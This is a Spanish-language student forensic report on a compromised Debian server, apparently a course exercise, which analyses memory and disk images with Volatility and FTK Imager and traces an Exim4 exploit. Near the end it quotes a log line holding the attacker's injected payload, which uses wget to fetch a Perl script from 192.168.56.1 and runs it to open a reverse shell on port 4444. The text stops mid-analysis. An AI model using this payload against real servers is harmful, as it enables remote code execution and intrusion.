Analisis de evidencias

Introducción:

El proceso de un análisis informático forense como lo hemos venido viendo debe cumplir ciertos requisitos para que en primer lugar: cumpla con los objetivos que persigue ya sea encontrar evidencia que demuestre algo o un supuesto, o ya sea que encontrar evidencias de algún evento no determinado.

Por otro lado debe cumplir con tener validez judicial, es decir que pueda ser usado legalmente ante un juzgado para un caso.

Entre estos requisitos ya también se ha mencionado están la identificación, preservación, cadena de custodia, análisis, presentación de análisis.

Las herramientas también las hemos venido mencionando, herramientas de hardware y software que facilitan y aceleran el proceso, en modo semiautomático adelantan nuestro trabajo, realizan búsquedas específicas, hacen comparaciones, en fin podríamos decir que “nos realizan” el trabajo. Un punto que poco se ha comentado es que amén de todas las herramientas  y de todo el trabajo que realizan por el analista este último es insustituible en este proceso, es decir, no hay manera de que el proceso del análisis de la evidencia pueda arrojar un resultado sin la intervención del analista forense.

En esta actividad trataremos de demostrar a partir de los elementos que se nos entreguen si las presunciones que se nos dicen son ciertas, si no lo son y porque, generar evidencia valida sobre nuestras hipótesis y conclusiones, y sustento a las respuestas que entreguemos.

Desarrollo:

Contamos con archivos de imagen de un servidor que presuntamente fue violentado de alguna manera, suponemos que el proceso de adquisición fue debidamente llevado a cabo, de tal manera que no documentaremos dicho proceso.

Los archivos son los siguientes:

victoria-v8.kcore.img

victoria-v8.memdump.img

victoria-v8.sda1.img

Herramientas de software a usar durante el proceso de análisis

Kali Linux

Comando MD5sum

Volatitilty

Windows 8.1

FTK Imager

Editor y visualizador de texto Nano y Notepad ++

Objetivos:

Realizar análisis forense informático en  un servidor virtual a fin de demostrar que fue comprometido y violentado por hackers, determinar los servicios comprometidos junto con el origen del ataque y atacante, el tipo del ataque que fue y demostrarlo en la línea del tiempo.

Se debe concluir las áreas de oportunidad en el sistema de seguridad que prevalecía en el servidor así como las recomendaciones para futuros incidentes.

Enumerar las técnicas y las herramientas usadas durante el proceso incluido la recolección.

Recolección

Para esta actividad suponemos la recolección correcta y la cadena de custodia bien llevada, con escenas preservadas y debidamente etiquetadas y documentadas.

Las imágenes nos son entregadas en laboratorio resultado de un copiado seguro.

Hash de validación de integridad de los archivos de imagen:

Selección de elementos de búsqueda

Se montó la imagen del disco duro del sistema usando FTK Imager, y de esa manera revisar la estructura de archivos del sistema

[pic 1]

Fig. 01. Imagen del disco sda1 montado usando FTK.

En una primera revisión podemos identificar un sistema Linux pero se utilizó el contenido de los archivos /etc/issue y /etc/debían_version para obtener la distribución y la versión del S.O.

Para efectos de velocidad se exportó

Con la versión ya identificada se usó volatility dentro de Kali para hacer un listado de los procesos ejecutados.

volatility -f /mnt/docs/victoria-v8.memdump.img --profile=LinuxDebian5010x86 linux_pslist > /home/analisis_forense/victoria/memdump.txt

y

volatility -f /mnt/docs/victoria-v8.memdump.img --profile=LinuxDebian5010x86 linux_pslist > /home/analisis_forense/victoria/memdump.txt

El resultado del comando volatility se encuentra en los archivos memdump.txt y memdump_netstat.txt

En el análisis del resultado de procesos en ejecución encontramos como últimos procesos ejecutados el servicio de mail exim4, el servicio cron y varias terminales, el análisis de la memoria usando el parámetro netstat arroja los puertos abiertos 4444 y 8888 por la misma dirección IP : 192.168.56.1

[pic 2]

Fig. 02. Volatility en Kali Linux comando linux_pslist

[pic 3]

Fig. 03. Volatility en Kali Linux comando linux_netstat

Partiendo de esta información formamos la hipótesis de que el servicio explotado es el exim4, para esto usamos información encontrada sobre vulnerabilidades conocidas de este servicio, esto nos sirvió para 2 cosas: Reafirmar la teoría de que el servicio vulnerado fue exim y 2 para en base a los datos sobre la vulnerabilidad tratar de encontrar evidencia que nos confirme el ataque.

Se revisaron los siguientes archivos en busca de evidencia:

/root/.bash_history

/var/log/exim4/mainlog

/var/log/exim4/rejectlog

/var/log/exim4/paniclog

/var/log/auth.log

Respuesta a cuestionamientos:

1. ¿Fue el sistema comprometido y cuándo?  R.- Como se demostrará más adelante el sistema si fue comprometido, basado en la hora del sistema el ataque se realizó el 2011-02-06 15:07:13 y fue exitoso con  la misma fecha, de acuerdo a los registros se encontró la siguiente entrada :

2011-02-06 15:07:13 1Pm5GZ-0000X2-Dc rejected from H=(abcde.com) [192.168.56.101]: message too big: read=52724820 max=52428800

Que es cuando el atacante hizo la prueba de ataque

Se encontró otra entrada:

2011-02-06 15:08:13 H=(abcde.com) [192.168.56.101] temporarily rejected MAIL : failed to expand ACL string "pl 192.168.56.1 4444; sleep 1000000'"}} ${run{/bin/sh -c "exec /bin/sh -c 'wget http://192.168.56.1/c.pl -O /tmp/c.pl;perl /tmp/c.pl 192.168.56.1 4444; sleep 1000000'"}} ${run{/bin/sh -c "exec /bin/sh -c 'wget http://192.168.56.1/c.pl -O /tmp/c.pl;perl /tmp/c.pl 192.168.56.1 4444; sleep 1000000'"}}

...